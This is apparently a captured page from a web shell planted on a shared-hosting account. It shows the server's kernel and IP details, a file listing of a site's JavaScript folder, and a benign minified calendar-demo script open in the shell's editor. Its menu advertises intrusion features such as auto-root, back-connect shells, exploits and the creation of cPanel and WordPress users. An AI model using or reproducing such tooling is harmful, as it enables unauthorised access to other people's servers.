Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
resources /
js /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
alerts.init.js
509
B
-rw-r--r--
apexcharts.init.js
6.84
KB
-rw-r--r--
auth-2-carousel.init.js
83
B
-rw-r--r--
bootstrap-toastr.init.js
221
B
-rw-r--r--
calendar.init.js
16.15
KB
-rw-r--r--
calendars-full.init.js
6.82
KB
-rw-r--r--
calendars.js
2.97
KB
-rw-r--r--
chartjs.init.js
3.47
KB
-rw-r--r--
coming-soon.init.js
350
B
-rw-r--r--
crypto-dashboard.init.js
8.61
KB
-rw-r--r--
crypto-exchange.init.js
3.69
KB
-rw-r--r--
crypto-kyc-app.init.js
122
B
-rw-r--r--
crypto-orders.init.js
197
B
-rw-r--r--
crypto-wallet.init.js
754
B
-rw-r--r--
dashboard-blog.init.js
682
B
-rw-r--r--
dashboard.init.js
1.22
KB
-rw-r--r--
datatables.init.js
299
B
-rw-r--r--
echarts.init.js
8.08
KB
-rw-r--r--
ecommerce-cart.init.js
65
B
-rw-r--r--
ecommerce-select2.init.js
24
B
-rw-r--r--
email-editor.init.js
966
B
-rw-r--r--
file-manager.init.js
446
B
-rw-r--r--
flot.init.js
3.32
KB
-rw-r--r--
fontawesome.init.js
559.92
KB
-rw-r--r--
form-advanced.init.js
5.95
KB
-rw-r--r--
form-editor.init.js
949
B
-rw-r--r--
form-mask.init.js
60
B
-rw-r--r--
form-repeater.int.js
792
B
-rw-r--r--
form-validation.init.js
385
B
-rw-r--r--
form-wizard.init.js
220
B
-rw-r--r--
form-xeditable.init.js
1.17
KB
-rw-r--r--
gmaps.init.js
987
B
-rw-r--r--
ico-landing.init.js
854
B
-rw-r--r--
jquery-knob.init.js
33
B
-rw-r--r--
leaflet-map.init.js
4.72
KB
-rw-r--r--
leaflet-us-states.js
86.31
KB
-rw-r--r--
lightbox.init.js
1.73
KB
-rw-r--r--
materialdesign.init.js
307.09
KB
-rw-r--r--
modal.init.js
311
B
-rw-r--r--
product-filter-range.init.js
143
B
-rw-r--r--
profile.init.js
531
B
-rw-r--r--
project-overview.init.js
479
B
-rw-r--r--
range-sliders.init.js
1.32
KB
-rw-r--r--
rating-init.js
713
B
-rw-r--r--
saas-dashboard.init.js
1.62
KB
-rw-r--r--
schedules.js
2.69
KB
-rw-r--r--
session-timeout.init.js
300
B
-rw-r--r--
sparklines.init.js
2.21
KB
-rw-r--r--
sweet-alerts.init.js
4.37
KB
-rw-r--r--
table-editable.int.js
506
B
-rw-r--r--
table-responsive.init.js
169
B
-rw-r--r--
task-create.init.js
1.4
KB
-rw-r--r--
task-form.init.js
6.52
KB
-rw-r--r--
task-kanban.init.js
136
B
-rw-r--r--
tasklist.init.js
665
B
-rw-r--r--
timeline.init.js
209
B
-rw-r--r--
toastr.init.js
3.31
KB
-rw-r--r--
tui-charts.init.js
28.52
KB
-rw-r--r--
two-step-verification.init.js
274
B
-rw-r--r--
validation.init.js
320
B
-rw-r--r--
vector-maps.init.js
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : schedules.js
"use strict";var ScheduleList=[],SCHEDULE_CATEGORY=["milestone","task"];function ScheduleInfo(){this.id=null,this.calendarId=null,this.title=null,this.body=null,this.isAllday=!1,this.start=null,this.end=null,this.category="",this.dueDateClass="",this.color=null,this.bgColor=null,this.dragBgColor=null,this.borderColor=null,this.customStyle="",this.isFocused=!1,this.isPending=!1,this.isVisible=!0,this.isReadOnly=!1,this.goingDuration=0,this.comingDuration=0,this.recurrenceRule="",this.state="",this.raw={memo:"",hasToOrCc:!1,hasRecurrenceRule:!1,location:null,class:"public",creator:{name:"",avatar:"",company:"",email:"",phone:""}}}function generateTime(e,a,o){var n=moment(a.getTime()),a=moment(o.getTime()),o=a.diff(n,"days");e.isAllday=chance.bool({likelihood:30}),e.isAllday?e.category="allday":chance.bool({likelihood:30})?(e.category=SCHEDULE_CATEGORY[chance.integer({min:0,max:1})],e.category===SCHEDULE_CATEGORY[1]&&(e.dueDateClass="morning")):e.category="time",n.add(chance.integer({min:0,max:o}),"days"),n.hours(chance.integer({min:0,max:23})),n.minutes(chance.bool()?0:30),e.start=n.toDate(),a=moment(n),e.isAllday&&a.add(chance.integer({min:0,max:3}),"days"),e.end=a.add(chance.integer({min:1,max:4}),"hour").toDate(),!e.isAllday&&chance.bool({likelihood:20})&&(e.goingDuration=chance.integer({min:30,max:120}),e.comingDuration=chance.integer({min:30,max:120}),chance.bool({likelihood:50})&&(e.end=e.start))}function generateNames(){for(var e=[],a=0,o=chance.integer({min:1,max:10});a<o;a+=1)e.push(chance.name());return e}function generateRandomSchedule(e,a,o){var n=new ScheduleInfo;n.id=chance.guid(),n.calendarId=e.id,n.title=chance.sentence({words:3}),n.body=chance.bool({likelihood:20})?chance.sentence({words:10}):"",n.isReadOnly=chance.bool({likelihood:20}),generateTime(n,a,o),n.isPrivate=chance.bool({likelihood:10}),n.location=chance.address(),n.attendees=chance.bool({likelihood:70})?generateNames():[],n.recurrenceRule=chance.bool({likelihood:20})?"repeated events":"",n.state=chance.bool({likelihood:20})?"Free":"Busy",n.color=e.color,n.bgColor=e.bgColor,n.dragBgColor=e.dragBgColor,n.borderColor=e.borderColor,"milestone"===n.category&&(n.color=n.bgColor,n.bgColor="transparent",n.dragBgColor="transparent",n.borderColor="transparent"),n.raw.memo=chance.sentence(),n.raw.creator.name=chance.name(),n.raw.creator.avatar=chance.avatar(),n.raw.creator.company=chance.company(),n.raw.creator.email=chance.email(),n.raw.creator.phone=chance.phone(),chance.bool({likelihood:20})&&(e=chance.minute(),n.goingDuration=e,n.comingDuration=e),ScheduleList.push(n)}function generateSchedule(n,i,t){ScheduleList=[],CalendarList.forEach(function(e){var a=0,o=10;for("month"===n?o=3:"day"===n&&(o=4);a<o;a+=1)generateRandomSchedule(e,i,t)})}
Close